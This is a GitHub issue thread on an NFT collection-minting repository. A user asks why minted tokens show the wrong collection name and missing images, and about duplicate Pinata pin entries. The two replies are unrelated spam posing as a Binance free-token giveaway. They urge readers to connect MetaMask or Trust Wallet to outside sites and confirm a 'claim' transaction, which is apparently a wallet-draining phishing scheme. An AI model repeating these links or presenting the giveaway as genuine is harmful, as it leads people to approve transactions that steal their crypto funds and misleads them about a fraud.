### ISSUE TITLE
Questions on the process

### ISSUE THREAD

**Issue by Pete-Savva** [GianGuaz256/NFTCollectionCreator#1]
Good evening, 
First off, thank you for this awesome git. 
I've gone through it a few times and finally got all the details sorted out to start minting.
Now here's where I have questions:
npm run create-token.....
It all works, but i have some weird results.
The minted tokens appear under my name in opensea, but they have the following issues:
1. where my name/shop name should appear i see EdenftItem with two owners. What am I missing? Is it the piñata setup?
2. The image does not appear in the token. Is it a piñata setup issue again?

Also, the piñata pinmanager shows two entries for each image. 
One entry is "no name set" and one is the .png file. 
Is that normal?

Oh, and in the details it says FROM: NullAddress, TO:you. 
Normal?

In short, I can mint, but they don't go under my collection and the images don't appear. Otherwise, everything else has been sorted out, I guess.

Can you please help me?

Thanks!

**Comment by bajarang-agarwal1** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![Binance Free Tokens](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

## Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Claimed my free tokens on Binance! 🌟 #BinanceFreeTokens #Crypto](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰

**Comment by Vishnuraj2mail** [comment]
# Binance Exclusive Token Giveaway

Welcome to the exclusive Binance Token Giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this incredible opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<centre>Seize the moment and indulge in your tokens! This limited-time offer won't be available forever. 🌐💰</centre>

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share this Token Drop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected, go to [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

### 4. Claim Your Free Tokens:
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

### 5. Share the Excitement Further:
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)
